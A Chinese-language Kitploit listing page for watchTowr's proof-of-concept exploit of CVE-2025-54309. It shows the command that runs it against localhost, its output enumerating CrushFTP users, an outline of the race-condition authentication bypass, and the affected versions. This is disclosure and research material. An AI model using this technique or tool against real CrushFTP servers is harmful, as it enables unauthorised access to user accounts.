Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — 针对CVE-2025-54309的概念验证利用,演示了通过CrushFTP WebInterface中的竞争条件实现认证绕过以枚举用户。 | Kitploit
工具/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
漏洞分析漏洞利用信息收集Web安全渗透测试身份验证
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

针对CVE-2025-54309的概念验证利用,演示了通过CrushFTP WebInterface中的竞争条件实现认证绕过以枚举用户。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
2830年前Kitploit 审核通过

CVE-2025-54309

CrushFTP 认证绕过概念验证

查看我们的博客文章了解技术细节

实战检测

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

描述

此脚本是针对 CrushFTP 接口的 CVE-2025-54309 的概念验证。通过创建一组共享相同会话标识符的竞赛请求,一个请求将用户属性设置为“crushadmin”,另一个请求以该用户身份执行经过身份验证的命令,在此 POC 中可以提取用户名列表。更多详情请参阅我们的[博客文章] (https://labs.watchtowr.com/)。

受影响版本

  • 10.8.5 之前版本
  • 11.3.4_23 之前的 11 版本

更多详情请查看 CrushFTP 安全公告

关注 watchTowr 实验室

关注 watchTowr 实验室团队,获取最新的安全研究动态

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
下载工具